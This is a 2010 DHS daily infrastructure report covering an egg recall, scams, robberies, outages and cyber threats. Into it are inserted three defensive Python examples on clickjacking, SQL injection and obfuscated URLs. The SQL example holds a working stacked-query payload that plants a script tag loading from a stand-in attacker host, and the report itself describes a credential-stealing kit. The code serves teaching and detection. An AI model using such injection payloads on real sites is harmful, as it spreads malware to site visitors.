Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, August 19, 2010

Complete DHS Daily Report for August 19, 2010

Daily Report

Top Stories

• An Iowa egg producer is recalling 228 million eggs after being linked to an outbreak of salmonella poisoning, according to Associated Press. The federal Centers for Disease Control and Prevention said eggs from Wright County Egg in Galt, Iowa, were linked to several illnesses in Colorado, California and Minnesota. (See item 29)

29. August 17, Associated Press – (National) 228M eggs recalled following salmonella outbreak. An Iowa egg producer is recalling 228 million eggs after being linked to an outbreak of salmonella poisoning. The federal Centers for Disease Control and Prevention (CDC) said eggs from Wright County Egg in Galt, Iowa, were linked to several illnesses in Colorado, California and Minnesota. The CDC said about 200 cases of the strain of salmonella linked to the eggs were reported weekly during June and July, four times the normal number of such occurrences. State health officials said tainted eggs have sickened at least 266 Californians and seven in Minnesota. The eggs were distributed around the country and packaged under the names Lucerne, Albertson, Mountain Dairy, Ralph’s, Boomsma’s, Sunshine, Hillandale, Trafficanda, Farm Fresh, Shoreland, Lund, Dutch Farms and Kemp. The Food and Drug Administration (FDA) is investigating. In a statement, company officials said the FDA is “on-site to review records and inspect our barns.” The officials said they began the recall August 13. Source:

• The Kitsap Sun reports that stormwater grates have been vanishing in South Kitsap, Washington, creating a dangerous hazard and running up a bill as the county scrambles to replace them. (See item 34)

34. August 16, Kitsap Sun – (Washington) South Kitsap’s stormwater grates are disappearing ... but why? Stormwater grates have been vanishing in South Kitsap, Washington, creating a dangerous hazard and running up a bill as the county scrambles to replace them. Thirty-one grates have been taken since July 21, according to the Kitsap County Public Works Department. The sales manager at Navy City Metals in Gorst said the 31 covers, combined, are probably worth about $200 as scrap metal. Each cast-iron-and-steel cover weighs about 70 pounds, said the assistant director of public works. The cost to the county is much greater. The grates cost $82 apiece to replace, or at least $2,500 in all. Officers are placing cones or markers around the holes until public works can fasten in new grates. So far, no one has been hurt. Officers previously have seen grates removed and thrown in storm drains, but this is the first time they have been stolen. As they replace the covers, crews are bolting them down to make them harder to steal. But that also makes them harder to remove for maintenance. Metal recyclers in Kitsap and Pierce counties have been notified of the thefts. There are more than 10,500 such covers in the county. Source:


Banking and Finance Sector

15. August 18, Myrtle Beach Sun News – (National) Myrtle Beach man charged in Ponzi scheme. A Myrtle Beach man and two California residents have been arrested on charges of operating a $26 million Ponzi scheme that victimized hundreds of investors nationwide. Federal prosecutors said recently that the Myrtle Beach man and two Oxnard, California residents were arrested by FBI agents. According to a federal grand jury indictment returned August 4, the defendants asked about 700 victims to invest in “ad toppers,” or advertising monitors on gas pumps, vending machines and ATMs. The defendants are accused of spending most of the investors’ money on personal expenses. Source:

16. August 18, Bend Bulletin – (Oregon) Local credit union warns of scam. Mid Oregon Credit Union warned its customers August 17 that someone has been pretending to be the credit union, calling customers on the phone with claims that their debit cards had been compromised and asking the customers for their card numbers. Mid Oregon said in a news release that it will never solicit customers via phone, e-mail or text message. The credit union said it took precautions to protect the accounts of members who were called. Source:

17. August 17, Boston Globe – (Massachusetts) FBI seeks female bank robber in Boston heists. Law enforcement officials are seeking a woman they believe robbed two Boston banks in late July and early August. The woman robbed the First Trade Union bank in Boston August 2 and five days earlier the City of Boston Credit Union in Dorchester, according to the FBI. Both times she wore a baseball cap, sliding a demand note to the teller and threatening them, then taking off on foot with the money. Witnesses told authorities she also carried a gun during one of the robberies, according to the FBI. Source:

18. August 16, Gwinnett Daily Post – (Georgia) FBI: Robbers hit Atlanta, Norcross banks. The FBI is searching for two wig-wearing, gun-wielding robbers suspected of hitting two metro Atlanta Wachovia banks, including a Norcross, Georgia branch. In both alleged heists, one armed suspect vaulted over a teller counter to snatch cash while his accomplice ordered lobby patrons to the ground at gunpoint. The suspects made off with an undisclosed amount of money each time, and no injuries were reported, said an FBI Atlanta spokesman. The latest heist happened about 10:30 a.m. August 16 at a 3374 Holcomb Bridge Road bank in Norcross. Two similar-looking men had used the same modus operandi about 10:44 a.m. July 27, when they held up a branch at 2725 Clairmont Road in Atlanta. Source:

19. August 16, WOOD 8 Grand Rapids – (Michigan; California) State: 400 investors lost $50M in scams. Three West Michigan companies and a California firm cost consumers about $50 million in alleged scams, according to Michigan regulators. At the center of the thefts is a suspect who ran several investment companies, including Diversified Global Finance and Diversified Liquid Asset Holdings. The Byron Center, Michigan man was selling his schemes through American Benefits Concepts, a Kalamazoo firm that also was selling an alleged scam product created by a California company. Now, the Michigan Office of Financial and Insurance Regulation has ordered all four companies to stop selling unregistered securities. The deals were “allegedly fraudulent real estate, ethanol, hedge fund and short-term loan investment scams,” the regulators said. Ever since the FBI began a criminal investigation and the alleged misdeeds became public last fall, those companies reportedly have ended such operations. But Michigan is saying there are 400 investors who have lost $50 million in these schemes. And there were warning signs victims may have missed, regulators said. Source:

Information Technology

50. August 18, Help Net Security – (International) DDoS threat spam targets domain owners. Symantec has spotted an unusual approach to parting users from their hard-earned cash. In the e-mail in question, the spammer professes to be a hacker with a network of computers at his disposal large enough to execute a DDoS attack on users’ Web sites, and asks the recipients to send him $200 to prevent his use of this network against their sites. The “To” field contains the e-mail address that the registrant provided in the contact details for the domain (which can be discovered with a simple whois lookup), and the “Subject” header reads “Hosting - Important Updates and Information,” making it look as though the e-mail comes from the hosting service provider. Symantec said the spelling mistakes in the e-mail are intentional, so that the message can evade content-based antispam filters. In this case they may also lend the sender a certain amount of credibility, since the name of the “hack project” sounds Slavic in origin; perfect English would probably raise more suspicion. Source:

51. August 18, The Register – (International) Clickjacking threat punts Facebook survey scam. Miscreants have unleashed a new type of clickjacking worm on Facebook. It tricks users into using the Facebook “Share” feature without notifying them that content is being shared. By contrast, an otherwise similar clickjacking attack dating from May relied on duping a user into injudicious use of the social network’s “Like” feature. Sophos explains that the latest attack poses as a “Facebook fan page” for the “Top 10 Funny T-Shirt Fails ROFL” and other potentially eye-catching content. These fan pages, once selected, load malicious script from an external domain, so the user unwittingly shares the dodgy page on their profile, promoting the scam to the mark’s friends and contacts on Facebook. Prospective marks running the NoScript Firefox plug-in are protected from this line of attack. The attack continues with a supposed “human verification step”: marks are invited to complete a time-wasting survey before they are allowed to view the T-shirts. The scammers earn money from completed surveys from dodgy marketing outfits. Sophos reports that marks must submit cell phone numbers, which are enrolled into an auto-renewing subscription service that costs $5 per week. Details of the terms and conditions of enrollment onto the “Awesome Test” are buried in small print. Facebook responded promptly to the appearance of the threat by deleting fan pages associated with the scam. Meanwhile Sophos has blocked the domain hosting the malicious code. Source:
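The attack above only works because the targeted page can be loaded inside an attacker’s frame, where the real “Share” control is positioned under a decoy the user thinks they are clicking. The following check, added here as an example and not code from the DHS report, Sophos or Facebook, takes the response headers of a page and decides whether a given origin may frame it, applying the browser rules for X-Frame-Options and the Content-Security-Policy frame-ancestors directive (which takes precedence when both are present). All header values and hostnames in it are constructed samples.

```python
"""Check whether a page's response headers stop other origins from framing it.

Added example, not code from the DHS report, Sophos or Facebook. Header sets
and hostnames below are constructed samples.
"""
from urllib.parse import urlsplit


def _origin(url):
    """(scheme, host[:port]) of a URL, lower-cased: the pair browsers compare."""
    p = urlsplit(url)
    return p.scheme.lower(), p.netloc.lower()


def _source_matches(src, framer):
    """Match one CSP scheme-source or host-source against the framing origin."""
    scheme, host = framer
    if src.endswith(":"):                       # scheme-source such as https:
        return scheme + ":" == src
    if "://" in src:                            # host-source with an explicit scheme
        src_scheme, src_host = src.split("://", 1)
        if src_scheme != scheme:
            return False
    else:
        src_host = src
    if src_host.startswith("*."):               # wildcard label matches subdomains only
        return host.endswith(src_host[1:])
    return host == src_host


def _frame_ancestors_allows(policy, page, framer):
    """True/False per frame-ancestors; None when the policy has no such directive."""
    for directive in policy.split(";"):
        tokens = directive.split()
        if not tokens or tokens[0].lower() != "frame-ancestors":
            continue
        sources = [t.strip("'").lower() for t in tokens[1:]]
        if not sources or "none" in sources:    # 'none' (or an empty list) denies all
            return False
        for src in sources:
            if src == "*":
                return True
            if src == "self":
                if framer == page:
                    return True
            elif _source_matches(src, framer):
                return True
        return False
    return None


def may_be_framed(headers, page_url, framer_url):
    """True if the page at page_url can be embedded by a page at framer_url.

    Browsers honour CSP frame-ancestors when present and then ignore
    X-Frame-Options; with neither header any site may frame the page, which is
    the precondition for the invisible "Share" trick described above.
    """
    h = {k.lower(): v for k, v in headers.items()}
    page, framer = _origin(page_url), _origin(framer_url)

    csp = h.get("content-security-policy")
    if csp is not None:
        verdict = _frame_ancestors_allows(csp, page, framer)
        if verdict is not None:
            return verdict

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer == page
    if xfo.startswith("ALLOW-FROM"):            # obsolete syntax, still seen in the wild
        fields = xfo.split(None, 1)
        return len(fields) == 2 and _origin(fields[1]) == framer
    return True                                 # missing or unrecognised value: no protection


if __name__ == "__main__":
    page = "https://www.example.com/fan-page"          # constructed target page
    attacker = "https://evil.example/t-shirt-fails"     # constructed framing site
    partner = "https://app.partner.example/widget"      # constructed allowed framer
    samples = {
        "no headers": {},
        "xfo sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
        "csp overrides xfo": {"X-Frame-Options": "DENY",
                              "Content-Security-Policy": "frame-ancestors 'self' https://*.partner.example"},
    }
    for name, hdrs in samples.items():
        print(f"{name:>18}: attacker={may_be_framed(hdrs, page, attacker)} "
              f"partner={may_be_framed(hdrs, page, partner)}")
```

A page that returns True for an arbitrary origin is frameable, and therefore clickjackable, regardless of any JavaScript frame-busting it carries; the check is worth running against every state-changing page of an application, not only the login form.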

52. August 17, The Register – (International) hit in latest mass hack attack. A hack attack that can expose users to malware exploits has infected more than 1 million Web pages, at least two of which belong to Apple. The SQL injection attacks bombard the Web sites of legitimate companies with database commands that attempt to add hidden links that lead to malware exploits. While most of the sites that fell prey appear to belong to mom-and-pop operations, two of the infections hit pages Apple uses to promote iTunes podcasts, a Google search shows. The malicious links appear to have been removed since Google last indexed the pages in early August. In all, at least 538,000 pages have been compromised by the same attack. Attacks that bear similar fingerprints but point to different domains have claimed close to 500,000 more. “These attacks have been ongoing and are changing pretty often,” said a senior researcher with ScanSafe, a Cisco-owned service that provides customers with real-time intelligence about malicious sites. “Interestingly, many of the sites compromised have been involved in repeated compromises over the past few months. It’s not clear whether these are the work of the same attackers or are competing attacks.” Source:
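Mass injections of this kind do not exploit anything exotic: a request parameter is concatenated into a SQL statement, the database driver accepts several statements separated by semicolons, and the attacker’s appended UPDATE stitches a script tag onto every text column it can reach. The block below, added here as an example and not code from the DHS report, The Register or ScanSafe, models that with an in-memory SQLite database: a vulnerable page-hit handler beside a parameterized one, and a scanner that walks every text column of every table looking for script or iframe tags that load from a host the site does not own, which is the cleanup check a site owner wants after reading a story like this. The schema, rows and script host are constructed and hypothetical.

```python
"""Stacked-query SQL injection that plants a hidden script tag, and how to find it.

Added example, not code from the DHS report, The Register or ScanSafe. The
schema, rows and the script host are constructed; nothing here reproduces the
real campaign's payload.
"""
import re
import sqlite3

INJECTED_HOST = "malware-host.invalid"                       # hypothetical attacker host
INJECTED_TAG = f'<script src="http://{INJECTED_HOST}/ur.js"></script>'


def make_db():
    """In-memory stand-in for a site's content database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, hits INTEGER DEFAULT 0);
        INSERT INTO pages (id, title, body) VALUES (1, 'Podcast: Episode 1', '<p>Show notes 1</p>');
        INSERT INTO pages (id, title, body) VALUES (2, 'Podcast: Episode 2', '<p>Show notes 2</p>');
    """)
    return conn


def record_hit_vulnerable(conn, page_id):
    """Legacy handler: the request parameter is pasted into SQL and the driver
    runs several ';'-separated statements, so an UPDATE meant for one row can
    be followed by an attacker-supplied UPDATE on every row."""
    conn.executescript(f"UPDATE pages SET hits = hits + 1 WHERE id = {page_id}")


def record_hit_safe(conn, page_id):
    """Hardened handler: one statement, the parameter bound as a value. Returns
    the number of rows updated (0 when the 'id' is an injection string)."""
    cur = conn.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (page_id,))
    conn.commit()
    return cur.rowcount


# script/iframe tag whose src points at some host; the host is captured
EXTERNAL_LOADER = re.compile(
    r'<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)


def find_injected_links(conn, own_hosts):
    """Walk every TEXT column of every table and report script/iframe tags that
    load from a host outside own_hosts, as (table, column, rowid, host) tuples."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:                         # names come from the schema, not from users
        text_cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')
                     if (r[2] or "").upper() == "TEXT"]
        for col in text_cols:
            for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
                for host in EXTERNAL_LOADER.findall(value or ""):
                    if host.lower() not in own_hosts:
                        hits.append((table, col, rowid, host))
    return hits


if __name__ == "__main__":
    # What the attacker sends as the page id parameter (constructed payload).
    payload = f"1; UPDATE pages SET body = body || '{INJECTED_TAG}'"
    conn = make_db()
    record_hit_vulnerable(conn, payload)
    print("after vulnerable handler:", find_injected_links(conn, {"www.example.com"}))
    conn = make_db()
    print("rows touched by safe handler with same payload:", record_hit_safe(conn, payload))
    print("after safe handler:", find_injected_links(conn, {"www.example.com"}))
```

The scanner is deliberately schema-agnostic: the campaigns described above append the same tag to whatever text columns exist, so a check limited to the columns a developer remembers will miss rows in tables nobody thought of.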

53. August 17, Computerworld – (International) Adobe to patch Reader zero-day bug Thursday. Adobe said August 17 that it would patch a critical Reader vulnerability August 19. Two weeks ago, Adobe had promised to fix the flaw during the week of August 16 with an emergency, or “out-of-band,” security update, but had not slated a specific date. Computerworld had pegged the likely release date as August 17 based on Adobe’s past practice of issuing many of its security updates on Tuesdays. The bug Adobe plans to patch was disclosed by a researcher at last month’s Black Hat security conference, when he demonstrated how the open-source BitBlaze toolkit could be used to boost bug-hunting productivity. The researcher, an analyst with Baltimore-based Independent Security Evaluators, is well known for finding vulnerabilities in Adobe’s popular Reader PDF viewer. Last March, he showed how a simple fuzzing tool could root out scores of potential bugs in Reader and other software. The researcher said the vulnerability is in Reader’s and Acrobat’s font parsing, but is not connected with the PDF font parsing flaw exploited by hackers to “jailbreak” Apple’s iOS 4 earlier this month. Apple patched that font vulnerability August 11. Source:

54. August 17, Help Net Security – (International) Facebook Hacker: A dangerous tool. Phishing is the weapon of choice for cybercriminals after log-in credentials. However, a new attack tool, Facebook Hacker, has drawn the attention of people who want usernames and passwords that are not theirs. This kit helps wrongdoers steal log-in credentials without the victim having to type anything. The kit is intuitive and easy to configure. There are only two fields that need filling in: a disposable e-mail address and its password, which together determine where the stolen information is delivered. After clicking the “build” button, a server.exe file is created and deposited into the Facebook Hacker folder along with the initial files. The server.exe file is then sent to intended victims. Once run, the malicious tool snatches the victim’s Facebook account credentials, along with all usernames and passwords the user has asked browsers to remember. To collect those passwords, the malicious binary includes components able to extract data from the most popular browsers on the market, as well as from almost all available instant messaging clients. The application also enumerates all dialup/VPN entries on the computer and displays their log-on details: user name, password, and domain. To avoid detection, Facebook Hacker also looks for all the processes related to a security suite and kills them on sight. The kit carries a hard-coded list of processes associated with AV solutions that are to be checked and stopped, if found. The malware also looks for network monitoring applications and terminates them, a precaution that prevents curious users from seeing their passwords leave the system. Source:

55. August 17, The Register – (International) Mozilla eases fears over phishy URL alert. Mozilla developers have eased concerns about the severity of a gap in a Firefox security feature that fails to warn users when they encounter obfuscated URLs that might lead to malicious Web sites. Developers of the open-source browser have known of the warning bypass since June. Under most circumstances, Firefox displays a warning when users click on links whose addresses have been obfuscated to hide their true destination. But when users encounter encoded URLs in inline frames embedded in a Web page, no such alert is delivered. “This impacts user security because obfuscated links in the iframes might trick the user to visit false links,” the person reporting the behavior wrote. On August 17, the same person, a researcher from Web security firm Armorize, repeated the warning. “In certain cases, it can be used effectively in spreading malware and stealing sensitive information,” the researcher wrote on the Armorize blog. But Mozilla said August 17 that it does not believe the behavior represents much of a risk, because the obfuscated links are not visible during normal surfing anyway. The statement reminded everyone that Firefox ships with protection that automatically warns users when they are about to access pages identified in phishing or malware scams. Source:
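The warning at issue exists because a URL can be written so that what a reader sees is not where the browser goes: a trusted-looking name placed in the userinfo part before an “@”, percent-encoded characters in the host, or a host written as a single decimal, hexadecimal or octal number instead of dotted decimal. The code below, added here as an example and not code from the DHS report, Mozilla or Armorize, resolves a link the way a browser would and flags those tricks, then applies the same check to the href and iframe src attributes of a page, which is where the unwarned case above lives. It goes slightly beyond the story by handling all the numeric host forms browsers accept; the HTML and hostnames in it are constructed samples.

```python
"""Work out where an obfuscated link really goes, including links hidden in iframes.

Added example, not code from the DHS report, Mozilla or Armorize. The HTML and
hostnames below are constructed samples; the IPv4 shorthand rules are the ones
browsers apply (decimal, hex and octal parts, fewer than four parts).
"""
import ipaddress
import re
from urllib.parse import unquote, urlsplit


def _ipv4_part(text):
    """One dotted part as browsers read it: 0x.. hex, leading-0 octal, else decimal."""
    if text[:2].lower() == "0x":
        return int(text[2:] or "0", 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text)


def numeric_host(host):
    """Dotted-decimal form of a numeric host (3232235777, 0xC0A80101,
    0300.0250.0001.0001, 192.168.257 ...), or None if the host is not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(parts):
        return None
    try:
        nums = [_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    *head, last = nums
    if any(n > 255 for n in head) or last >= 256 ** (5 - len(nums)):
        return None
    value = 0
    for n in head:
        value = value * 256 + n
    value = value * 256 ** (5 - len(nums)) + last   # the last part fills the remaining bytes
    return str(ipaddress.IPv4Address(value))


def reveal_destination(href):
    """What the browser connects to for href, plus the parts an attacker relies
    on the reader not noticing: a userinfo decoy, percent-encoding, a numeric host."""
    parts = urlsplit(href.strip())
    raw_host = parts.hostname or ""                  # userinfo and port already stripped
    host = unquote(raw_host).lower().rstrip(".")
    ip = numeric_host(host)
    decoy = parts.netloc.rpartition("@")[0] or None  # text before '@' that looks like a site
    return {
        "scheme": parts.scheme.lower(),
        "host": ip or host,
        "decoy": unquote(decoy) if decoy else None,
        "path": unquote(parts.path) or "/",
        "suspicious": decoy is not None or ip is not None or "%" in raw_host,
    }


# href of <a> and src of <iframe>, quoted attribute values only (sufficient for the sample)
LINK_RE = re.compile(r'<(?:a|iframe)\b[^>]*?\b(?:href|src)\s*=\s*["\']([^"\']+)', re.I)


def suspicious_links(html):
    """Links and iframe sources in html that use one of the tricks above,
    returned as (as written, real host) pairs."""
    out = []
    for href in LINK_RE.findall(html):
        dest = reveal_destination(href)
        if dest["suspicious"]:
            out.append((href, dest["host"]))
    return out


if __name__ == "__main__":
    # Constructed page: one honest link and one zero-size iframe with a decoy host.
    sample = ('<p><a href="https://www.example.com/">home</a></p>'
              '<iframe src="http://www.bank.example@0xC0A80101/signin" width="0" height="0"></iframe>')
    for written, real in suspicious_links(sample):
        print(f"{written} -> actually {real}")
```

The iframe case is the one Firefox did not warn about: the frame is never clicked, so the user-facing warning never fires, and only inspection of the markup or of the resulting network connection shows the real host.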

Communications Sector

56. August 18, – (Oklahoma) A lightning strike knocks Cox stations in Tulsa off the air. A rainstorm packing strong winds and lightning was the reason all five Cox-owned radio stations in Oklahoma were knocked off the air early August 17. Radio-Info has been told that an air-to-ground lightning strike directly hit the building at 10:02 a.m., knocking News Talk KRMG-AM/FM (740/102.3), KWEN-FM (95.5), KRAV-FM (96.5) and KJSR-FM “Star” (103.3) off the air, along with their Web site streams. An engineer at Cox Radio-Tulsa said it took nearly two hours for a team of engineers to get all of the stations’ transmitters back in operation. All online streams were resumed, except for KRMG, which was still out of action at 1:45 p.m. The engineer said the Tulsa area has suffered through a spell of no rain and hot, 100-degree weather of late. The lightning strike had a minimal effect on building power but a major impact on the transmitters. Source:

57. August 18, Jackson County Floridian – (Florida) Communications blackout. A fiber optic line was cut in Cottondale, Florida, early August 17, leaving land lines, cellular phone service and Internet inoperable for about six hours. The outage affected individuals and businesses across Jackson and Holmes counties. CenturyLink customers across the two counties were left without long distance phone and Internet service from about 8:30 a.m. to 2:30 p.m., according to a regional representative for CenturyLink. Cellular phone service was affected because the wireless system has to tie into a land line; the fiber that was cut disconnected the wireless network from the landline system, according to a regional representative for Verizon Wireless. It is not known who cut the cable. It was an “external party” and not CenturyLink, the representative said. Emergency services were affected in the two counties. The Bonifay Police Department sent a press release through a Mediacom cable Internet account, a service that appeared to be unaffected by the outage. Washington County was not affected by the outage, and it was assisting with dispatch for Jackson and Holmes counties, according to an official at the Washington County Sheriff’s Office. Basic 911 service was available in Jackson County. However, the “enhanced” part of 911 service that provides the locations from which calls are made was down. Sheriff’s office officials had to rely on transmitting information through radios, because patrol vehicle computers could not be used to communicate with dispatchers. Source:

58. August 17, IDG News Service – (National) FCC: Consumers get half of advertised broadband speed. The actual download speeds consumers get are about half of those promised by service providers, according to a report released this week by the Federal Communications Commission (FCC). In 2009, U.S. residential consumers subscribed to broadband services with an average and median advertised download speed of 7 Mbps and 8 Mbps, respectively, the FCC said. But the actual average speed they received was 4 Mbps, and the actual median speed was 3 Mbps. The FCC criticized the use of maximum rather than actual speeds, and said it will support efforts to develop a better way to represent bandwidth. The maximum advertised speed ignores network congestion, underperforming computers and routers, and Web sites and applications that are not optimized, the FCC said. “Yet this ‘up to’ speed is commonly the only metric that can be used to compare the speeds of different broadband offerings. The ‘up to’ speed, however, does not provide an accurate measure of likely end-user broadband experience,” the FCC wrote in the report, released August 17. Source:

59. August 17, Charleston State Journal – (West Virginia) Satellite phone reports explosion, causes delays. A spokesman for Chief Well Gas told Marshall County, West Virginia, commissioners that an employee used a satellite phone to report the June 7 gas explosion. They have since learned that the phone call was diverted to Texas, which made locating the explosion difficult. Officials said all of that led to a delayed response in getting to the scene. Seven people were injured in the explosion. Company officials now say that six of those workers are back on the job. Commissioners held an emergency meeting August 17 to try to improve communications. One county commissioner asked gas companies to consider contributing money to improve cell phone towers for better communications in remote areas of the county. Source:

60. August 17, TechWorld – (International) Facebook popularity eats company bandwidth. Employees in the U.K. are now so fascinated with Facebook that they access it more often than any other single Web site or service, including, incredibly, Google search. According to Network Box’s latest 14 billion URL survey of traffic through its managed servers, Facebook now consumes 4.5 percent of corporate bandwidth, or just over 7 percent of all outward business traffic, equivalent to over 1 billion hits and rising in the second quarter. Only the video-based YouTube beats Facebook for corporate bandwidth consumption, consuming a startling 10.2 percent, but in terms of visits, Google is still way behind at 3.9 percent. Other notable bandwidth consumers include Yahoo’s image server, Yimg, which uses 2.9 percent of bandwidth and generated 2.9 percent of hits, and Windows updates, which accounts for 2.3 percent of hits. Leaving aside search engines, which can claim to have legitimate business uses, it is clear that traffic to consumer Web sites such as Facebook and YouTube is now a major use for business networks whether companies approve or not. Source: